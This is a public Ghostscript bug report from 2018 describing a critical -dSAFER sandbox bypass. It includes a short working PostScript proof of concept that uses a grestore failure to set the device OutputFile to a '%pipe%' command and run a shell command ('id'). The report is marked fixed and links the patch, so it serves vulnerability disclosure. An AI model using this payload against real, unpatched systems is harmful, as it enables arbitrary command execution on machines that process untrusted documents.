| Summary: | another grestore failure SAFER bypass | ||
|---|---|---|---|
| Product: | Ghostscript | Reporter: | Tavis Ormandy <taviso> |
| Component: | Security (public) | Assignee: | Chris Liddell (chrisl) <chris.liddell> |
| Status: | RESOLVED FIXED | ||
| Severity: | critical | CC: | cbuissar, scorneli |
| Priority: | P4 | ||
| Version: | unspecified | ||
| Hardware: | PC | ||
| OS: | Linux | ||
| See Also: |
https://bugs.ghostscript.com/show_bug.cgi?id=699654 https://bugs.ghostscript.com/show_bug.cgi?id=699687 https://bugs.ghostscript.com/show_bug.cgi?id=699718 |
||
| Customer: | Word Size: | --- | |
|
Description
Tavis Ormandy
2018-09-04 18:38:27 UTC
Running that with the 9.24 release gives: Error: /undefined in --.putdeviceprops-- Operand stack: Execution stack: %interp_exit .runexec2 --nostringval-- --nostringval-- --nostringval-- 2 %stopped_push --nostringval-- --nostringval-- --nostringval-- false 1 %stopped_push 2015 1 3 %oparray_pop 2014 1 3 %oparray_pop 1998 1 3 %oparray_pop 1884 1 3 %oparray_pop --nostringval-- %errorexec_pop .runexec2 --nostringval-- --nostringval-- --nostringval-- 2 %stopped_push --nostringval-- 1863 4 3 %oparray_pop Dictionary stack: --dict:978/1684(ro)(G)-- --dict:0/20(G)-- --dict:78/200(L)-- Current allocation mode is local Last OS error: Resource temporarily unavailable Current file position is 135 GPL Ghostscript 9.24: Unrecoverable error, exit code 1 Sorry, please use the commandline: gs -dSAFER -sDEVICE=ppmraw -f 699714.ps Apologies for not specifying that. Here is a version that works without specifying the device, just for reference.
userdict /setpagedevice undef
currentpagedevice /PageSize get 0 (foobar) put
a0
{ grestore } stopped clear
% make sure we have a device with OutputFile
(ppmraw) selectdevice
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
{ showpage } stopped pop
quit
This one is fixed in: http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=5812b1b78fc4 |